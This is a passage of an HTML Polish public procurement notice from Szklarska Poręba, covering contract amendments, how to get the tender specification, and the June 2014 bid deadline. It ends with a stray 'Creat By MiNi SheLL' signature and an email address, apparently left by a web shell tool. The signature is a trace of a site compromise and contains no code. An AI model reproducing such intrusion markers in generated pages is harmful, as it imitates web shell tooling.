2.  Sporządzenia aneksu do umowy nie wymaga : zmiana danych teleadresowych, zmiana osób wskazanych do   kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana rachunku bankowego), zmiana kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu w przypadku pisemnego wyrażenia zgody przez Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szklarskaporeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie ze strony internetowej -w wersji papierowej - w ciągu 5 dni od daty złożenia wniosku z dołączonym dowodem wpłaty 40 zł na konto Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2014 godzina 10:00, miejsce: siedziba Zamawiającego: 58-580 Szklarska Poręba, ul. M. Buczka 2 lub bezpośrednio w Biurze Obsługi Interesanta - parter (adres jw.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com